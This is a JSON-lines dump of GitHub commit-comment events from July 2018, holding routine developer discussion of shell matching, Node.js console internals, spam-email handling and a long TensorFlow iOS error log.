{"id":"7924082203","type":"CommitCommentEvent","actor":{"login":"MichaIng"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29608655,"position":550,"line":1921,"path":"dietpi/func/dietpi-set_hardware","commit_id":"0e5b8b22ce6115d5a26f0f05df4e80d1f6a2ca72","created_at":"2018-07-05T15:48:39Z","updated_at":"2018-07-05T15:48:39Z","author_association":"COLLABORATOR","body":"@Fourdee \r\nAhh here, the \"whoopsie\" occurred, I was already thinking if this `case $var in` means \"contain\", so that `snd-soc-allo-piano-dac` matches `allo-piano-dac*`. Now we know, it's not 😄."}},"created_at":"2018-07-05T15:48:39Z"}
{"id":"7924083551","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"mcollina/node"},"payload":{"comment":{"id":29608661,"position":6,"line":125,"path":"lib/internal/bootstrap/node.js","commit_id":"18fff38f1514ac8e067d337f42e655204f4637fb","created_at":"2018-07-05T15:48:53Z","updated_at":"2018-07-05T15:48:53Z","author_association":"NONE","body":"@mcollina \r\nCan you explain this bit some more. \r\nIs the original console (the one not produced by the lib/console automatically piped to the inspector?"}},"created_at":"2018-07-05T15:48:53Z"}
{"id":"7924088251","type":"CommitCommentEvent","actor":{"login":"isc7"},"repo":{"name":"isc7/pagina-web"},"payload":{"comment":{"id":29608670,"position":4,"line":4,"path":"index.html","commit_id":"581926dc5a047e73d8bcf8959e48c4d71597ba0f","created_at":"2018-07-05T15:49:41Z","updated_at":"2018-07-05T15:49:41Z","author_association":"OWNER","body":"Se ha puesto utf-8 como el charset de la pagina"}},"created_at":"2018-07-05T15:49:41Z"}
{"id":"7924089317","type":"CommitCommentEvent","actor":{"login":"heuermh"},"repo":{"name":"bigdatagenomics/adam"},"payload":{"comment":{"id":29608674,"position":5,"line":45,"path":"adam-core/src/main/scala/org/bdgenomics/adam/converters/FastqRecordConverter.scala","commit_id":"e7cbfcd2ae32f41d38e9dfdbd295f593d2f7f199","created_at":"2018-07-05T15:49:53Z","updated_at":"2018-07-05T15:49:53Z","author_association":"MEMBER","body":"Thank you, @zhangnew!  We should add that change with an additional unit test."}},"created_at":"2018-07-05T15:49:53Z"}
{"id":"7924089960","type":"CommitCommentEvent","actor":{"login":"huangqun"},"repo":{"name":"topcoder-platform/admin-app"},"payload":{"comment":{"id":29608675,"position":null,"line":null,"path":null,"commit_id":"92b237b782d468cc0d4c558df7e6bef49f335117","created_at":"2018-07-05T15:50:00Z","updated_at":"2018-07-05T15:50:00Z","author_association":"COLLABORATOR","body":"@ajefts it was working when we tested last time, did anything change on the api side? And do you have full log from the api on what exactly is wrong with the JSON?"}},"created_at":"2018-07-05T15:50:00Z"}
{"id":"7924091760","type":"CommitCommentEvent","actor":{"login":"coding-horror"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29608679,"position":30,"line":249,"path":"lib/email/receiver.rb","commit_id":"28dd7fb56231938141635cc08285368c8239bd6a","created_at":"2018-07-05T15:50:19Z","updated_at":"2018-07-05T15:50:19Z","author_association":"MEMBER","body":"Why do we want hidden posts for spam emails? This does not seem useful to\nme, can you provide examples of why this is needed?\nOn Thu, Jul 5, 2018 at 11:43 AM darix <notifications@github.com> wrote:\n\n> that's why I thought a site setting like\n>\n> email_in_spam_header:\n>   type: enum\n>   default: 'none'\n>   choices:\n>     X-Spam-Flag: /YES/i\n>     X-Spam-Status: /^YES, /i\n>\n> Would have been better. with the current code implementation, I am not\n> even sure why we need the list in site settings.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/discourse/discourse/commit/28dd7fb56231938141635cc08285368c8239bd6a#commitcomment-29608578>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABc7VU6oc3xT_RBd84I378F-T822D5ieks5uDjQPgaJpZM4VDkPO>\n> .\n>\n"}},"created_at":"2018-07-05T15:50:19Z"}
{"id":"7924092943","type":"CommitCommentEvent","actor":{"login":"mcollina"},"repo":{"name":"mcollina/node"},"payload":{"comment":{"id":29608684,"position":6,"line":125,"path":"lib/internal/bootstrap/node.js","commit_id":"18fff38f1514ac8e067d337f42e655204f4637fb","created_at":"2018-07-05T15:50:32Z","updated_at":"2018-07-05T15:50:32Z","author_association":"OWNER","body":"The original console is _only_ tied to the inspector."}},"created_at":"2018-07-05T15:50:32Z"}
{"id":"7924095546","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29608697,"position":48,"line":1118,"path":"CaseStudies/glass/docs/SRS/glassbr_srs.tex","commit_id":"1514d32e3d926af7e7bde94fcb81cf4a61323db3","created_at":"2018-07-05T15:50:59Z","updated_at":"2018-07-05T15:50:59Z","author_association":"COLLABORATOR","body":"After the merge of Devi's branch, this information is still missing... @smiths Next steps? Should this be given a new issue, and if so, should it be assigned to Devi or me?"}},"created_at":"2018-07-05T15:50:59Z"}
{"id":"7924109815","type":"CommitCommentEvent","actor":{"login":"sayon6860"},"repo":{"name":"sayon6860/JavBlockChain"},"payload":{"comment":{"id":29608729,"position":7,"line":39,"path":"src/javblockchain/BlockChain.java","commit_id":"8828c2b7014e6f784b2a8bf5763455e1aaefbee4","created_at":"2018-07-05T15:53:30Z","updated_at":"2018-07-05T15:53:30Z","author_association":"OWNER","body":"BlockShell does not support Transactions ... "}},"created_at":"2018-07-05T15:53:30Z"}
{"id":"7924116186","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"mcollina/node"},"payload":{"comment":{"id":29608753,"position":6,"line":125,"path":"lib/internal/bootstrap/node.js","commit_id":"18fff38f1514ac8e067d337f42e655204f4637fb","created_at":"2018-07-05T15:54:35Z","updated_at":"2018-07-05T15:54:35Z","author_association":"NONE","body":"Ah! How does it work today where I can have a file `foo.js`, that does `console.log(\"foo\")`, and `node --inspect-brk foo.js`, then continue execution in the inspector and have it log `foo` to the terminal and the chrome inspector?"}},"created_at":"2018-07-05T15:54:35Z"}
{"id":"7924118971","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29608760,"position":null,"line":null,"path":null,"commit_id":"a89803fcaf5f52e7a88a419eb304b6261f959f11","created_at":"2018-07-05T15:55:03Z","updated_at":"2018-07-05T15:55:03Z","author_association":"OWNER","body":"(cfg.ChannelIndex = channel)\r\nЭто даже лишнее. В HAL на 1хх серию в функции\r\nHAL_StatusTypeDef HAL_DMA_Init(DMA_HandleTypeDef *hdma)\r\nполе ChannelIndex персчитывается, так что можно выпилить как и mode"}},"created_at":"2018-07-05T15:55:03Z"}
{"id":"7924120213","type":"CommitCommentEvent","actor":{"login":"sayon6860"},"repo":{"name":"sayon6860/JavBlockChain"},"payload":{"comment":{"id":29608762,"position":7,"line":39,"path":"src/javblockchain/BlockChain.java","commit_id":"8828c2b7014e6f784b2a8bf5763455e1aaefbee4","created_at":"2018-07-05T15:55:17Z","updated_at":"2018-07-05T15:55:17Z","author_association":"OWNER","body":"but i completed that portion today only i will be updating that part soon."}},"created_at":"2018-07-05T15:55:17Z"}
{"id":"7924122587","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"mcollina/node"},"payload":{"comment":{"id":29608769,"position":6,"line":125,"path":"lib/internal/bootstrap/node.js","commit_id":"18fff38f1514ac8e067d337f42e655204f4637fb","created_at":"2018-07-05T15:55:40Z","updated_at":"2018-07-05T15:55:40Z","author_association":"NONE","body":"(The `console.log` from `foo.js` use is the lib/console one.)"}},"created_at":"2018-07-05T15:55:40Z"}
{"id":"7924123820","type":"CommitCommentEvent","actor":{"login":"ChrisUib"},"repo":{"name":"opensheetmusicdisplay/opensheetmusicdisplay"},"payload":{"comment":{"id":29608772,"position":null,"line":null,"path":null,"commit_id":"161702efeadbed2d87279ac9c4c415d54eefa8b6","created_at":"2018-07-05T15:55:52Z","updated_at":"2018-07-05T15:55:52Z","author_association":"MEMBER","body":"There was a typo: it should be the class \"StaveModifier\", not \"Stave\"\r\nBy the way, the function Position() overloads the one with equal name from the class Modifier."}},"created_at":"2018-07-05T15:55:52Z"}
{"id":"7924124869","type":"CommitCommentEvent","actor":{"login":"AcerWang"},"repo":{"name":"AcerWang/Programming-Courses"},"payload":{"comment":{"id":29608776,"position":null,"line":null,"path":null,"commit_id":"6f8ae88f555751163ff41e00c1145c0ce42f67ca","created_at":"2018-07-05T15:56:03Z","updated_at":"2018-07-05T15:56:03Z","author_association":"OWNER","body":"recover program-courses.xlsx"}},"created_at":"2018-07-05T15:56:03Z"}
{"id":"7924138442","type":"CommitCommentEvent","actor":{"login":"kmsoileau"},"repo":{"name":"kmsoileau/Saffron-2.0"},"payload":{"comment":{"id":29608800,"position":null,"line":null,"path":null,"commit_id":"191102f3852c52edc77c39125223f670d7b78259","created_at":"2018-07-05T15:58:24Z","updated_at":"2018-07-05T15:58:24Z","author_association":"OWNER","body":"Piton."}},"created_at":"2018-07-05T15:58:24Z"}
{"id":"7924139020","type":"CommitCommentEvent","actor":{"login":"mikebasdeo"},"repo":{"name":"mikebasdeo/BattleTanks"},"payload":{"comment":{"id":29608802,"position":null,"line":null,"path":null,"commit_id":"6fe84ffda7437920d91b45120be38a268b093709","created_at":"2018-07-05T15:58:31Z","updated_at":"2018-07-05T15:58:31Z","author_association":"OWNER","body":"![m1](https://user-images.githubusercontent.com/9420573/42334216-b9e29686-804a-11e8-9c6a-f68b588a0d2e.jpg)\r\n"}},"created_at":"2018-07-05T15:58:31Z"}
{"id":"7924139821","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29608805,"position":null,"line":null,"path":null,"commit_id":"ff76e0b28bcdeaf22b284cb65754cd3ddec4aa12","created_at":"2018-07-05T15:58:39Z","updated_at":"2018-07-05T15:58:39Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [docker](https://docker-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/watch.php](https://github.com/pantheon-systems/documentation/commit/44c8b31b0168a90797702c550b6b675c3db2d28e/scripts/watch.php)\n- [VERSION](https://github.com/pantheon-systems/documentation/commit/ff76e0b28bcdeaf22b284cb65754cd3ddec4aa12/VERSION)\n- [runthedocs.sh](https://github.com/pantheon-systems/documentation/commit/ff76e0b28bcdeaf22b284cb65754cd3ddec4aa12/runthedocs.sh)\n- [scripts/app.sh](https://github.com/pantheon-systems/documentation/commit/ff76e0b28bcdeaf22b284cb65754cd3ddec4aa12/scripts/app.sh)\n"}},"created_at":"2018-07-05T15:58:39Z"}
{"id":"7924140423","type":"CommitCommentEvent","actor":{"login":"kmsoileau"},"repo":{"name":"kmsoileau/Saffron-2.0"},"payload":{"comment":{"id":29608809,"position":null,"line":null,"path":null,"commit_id":"191102f3852c52edc77c39125223f670d7b78259","created_at":"2018-07-05T15:58:46Z","updated_at":"2018-07-05T15:58:46Z","author_association":"OWNER","body":"Revised README.md\r\n"}},"created_at":"2018-07-05T15:58:46Z"}
{"id":"7924142799","type":"CommitCommentEvent","actor":{"login":"mcollina"},"repo":{"name":"mcollina/node"},"payload":{"comment":{"id":29608817,"position":6,"line":125,"path":"lib/internal/bootstrap/node.js","commit_id":"18fff38f1514ac8e067d337f42e655204f4637fb","created_at":"2018-07-05T15:59:12Z","updated_at":"2018-07-05T15:59:12Z","author_association":"OWNER","body":"`setupInspector`  function in https://github.com/nodejs/node/blob/master/lib/internal/bootstrap/node.js#L417-L449 sets up a double-routing path for that call, so that it ends both in our console and in the inspector one."}},"created_at":"2018-07-05T15:59:12Z"}
{"id":"7924146944","type":"CommitCommentEvent","actor":{"login":"kevinjcliao"},"repo":{"name":"anntran14/hcstyleguide"},"payload":{"comment":{"id":29608829,"position":null,"line":null,"path":null,"commit_id":"6a6c223502a7833115db4e811564ab886fb17bc8","created_at":"2018-07-05T15:59:56Z","updated_at":"2018-07-05T15:59:56Z","author_association":"NONE","body":"Woahhhhhh\r\n\r\nWhat are those changes you made to index.html here? @anntran14 "}},"created_at":"2018-07-05T15:59:56Z"}
{"id":"7924152005","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29608843,"position":3,"line":3,"path":"globals/config.ml.in","commit_id":"c619caf856d8a5d05595554aa0f404cd399eee14","created_at":"2018-07-05T16:00:47Z","updated_at":"2018-07-05T16:00:47Z","author_association":"CONTRIBUTOR","body":"Will this function implementation [handle the following software situation anyhow](http://pubs.opengroup.org/onlinepubs/9699919799/functions/realpath.html \"Description for the usage of realpath()\")?\r\n\r\n…\r\n**ERRORS**\r\n…\r\n       **ELOOP**  A loop exists in symbolic links encountered during resolution of the _file_name_ argument.\r\n…"}},"created_at":"2018-07-05T16:00:47Z"}
{"id":"7924156626","type":"CommitCommentEvent","actor":{"login":"madieatv"},"repo":{"name":"oe-alliance/3rdparty-plugins"},"payload":{"comment":{"id":29608848,"position":null,"line":null,"path":null,"commit_id":"d0f47125ef76092943e919488b8b4eb7612501c4","created_at":"2018-07-05T16:01:34Z","updated_at":"2018-07-05T16:01:34Z","author_association":"CONTRIBUTOR","body":"but we practice that again ;)\r\n"}},"created_at":"2018-07-05T16:01:34Z"}
{"id":"7924160990","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29608856,"position":null,"line":null,"path":null,"commit_id":"d08f0544244f588bc0552ed8c3ef78deabeeabf4","created_at":"2018-07-05T16:02:20Z","updated_at":"2018-07-05T16:02:20Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-05T16:02:20Z"}
{"id":"7924162408","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29608859,"position":null,"line":null,"path":null,"commit_id":"ecebace5f82dd6c5e737f9a74d84733bca86a66d","created_at":"2018-07-05T16:02:34Z","updated_at":"2018-07-05T16:02:34Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#jul-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#jul-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://jul-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T16:02:34Z"}
{"id":"7924162870","type":"CommitCommentEvent","actor":{"login":"saracarl"},"repo":{"name":"benwbrum/fromthepage"},"payload":{"comment":{"id":29608861,"position":null,"line":null,"path":null,"commit_id":"35efbb1691a864cab35f276697d00e02d5ad11ff","created_at":"2018-07-05T16:02:39Z","updated_at":"2018-07-05T16:02:39Z","author_association":"COLLABORATOR","body":"@AustinCarr -- I think I'm missing the bigger picture here.  Why isn't there a transcription field on the 2nd page?"}},"created_at":"2018-07-05T16:02:39Z"}
{"id":"7924175901","type":"CommitCommentEvent","actor":{"login":"japer21"},"repo":{"name":"Jwata/SushiDetectoriOS"},"payload":{"comment":{"id":29608885,"position":null,"line":null,"path":null,"commit_id":"23cac79041168012b84f2ae015134158854a3cf4","created_at":"2018-07-05T16:05:03Z","updated_at":"2018-07-05T16:05:03Z","author_association":"NONE","body":"I am getting this:\r\n\r\n````\r\n2018-07-05 17:23:43.645456+0200 tensorflowiOS[2694:1801141] [MC] System group container for systemgroup.com.apple.configurationprofiles path is /private/var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles\r\n2018-07-05 17:23:43.647003+0200 tensorflowiOS[2694:1801141] [MC] Reading from public effective user settings.\r\n2018-07-05 17:23:46.265112: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"EncodeProto\" device_type: \"CPU\"') for unknown op: EncodeProto\r\n2018-07-05 17:23:46.265383: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"DecodeProtoV2\" device_type: \"CPU\"') for unknown op: DecodeProtoV2\r\n2018-07-05 17:23:46.265691: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"PopulationCount\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT32 } } }') for unknown op: PopulationCount\r\n2018-07-05 17:23:46.265773: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"PopulationCount\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT64 } } }') for unknown op: PopulationCount\r\n2018-07-05 17:23:46.267000: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT8 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.267121: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT16 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.267188: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT32 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.267402: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT64 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.267475: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT8 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.273190: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT16 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.273339: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT32 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.273619: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"RightShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT64 } } }') for unknown op: RightShift\r\n2018-07-05 17:23:46.274581: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT8 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.274687: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT16 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.278770: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT32 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.278868: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT64 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.278937: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT8 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.279004: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT16 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.279071: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT32 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.284847: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"LeftShift\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT64 } } }') for unknown op: LeftShift\r\n2018-07-05 17:23:46.284991: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT8 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.285061: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT16 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.285128: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT32 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.285194: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT64 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.286088: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT8 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.286210: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT16 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.286281: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT32 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.286348: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseAnd\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT64 } } }') for unknown op: BitwiseAnd\r\n2018-07-05 17:23:46.286704: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT8 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.286778: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT16 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.286844: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT32 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.286909: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT64 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.286984: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT8 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.287264: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT16 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.287338: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT32 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.287404: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseOr\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT64 } } }') for unknown op: BitwiseOr\r\n2018-07-05 17:23:46.287492: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT8 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.287622: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT16 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.287938: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT32 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.288006: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT64 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.288071: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT8 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.288134: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT16 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.288210: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT32 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.288498: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"BitwiseXor\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT64 } } }') for unknown op: BitwiseXor\r\n2018-07-05 17:23:46.288862: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT8 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.288939: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT16 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.289004: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT32 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.289208: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_INT64 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.289274: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT8 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.289338: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT16 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.289403: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT32 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.289478: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"Invert\" device_type: \"CPU\" constraint { name: \"T\" allowed_values { list { type: DT_UINT64 } } }') for unknown op: Invert\r\n2018-07-05 17:23:46.292281: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_INT64 } } }') for unknown op: MutableDenseHashTableV2\r\n2018-07-05 17:23:46.292423: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableDenseHashTableV2\r\n2018-07-05 17:23:46.292681: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_DOUBLE } } }') for unknown op: MutableDenseHashTableV2\r\n2018-07-05 17:23:46.292981: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_FLOAT } } }') for unknown op: MutableDenseHashTableV2\r\n2018-07-05 17:23:46.293061: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_STRING } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableDenseHashTableV2\r\n2018-07-05 17:23:46.293135: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: \"MutableDenseHashTableV2\" device_type: \"CPU\" constraint { name: \"key_dtype\" allowed_values { list { type: DT_INT64 } } } constraint { name: \"value_dtype\" allowed_values { list { type: DT_BOOL } } }') for unknown op: MutableDenseHashTableV2\r\n2018-07-05 17:23:46.293303: E tensorflow/core/framework/op_kernel.cc:1242] OpKernel ('op: 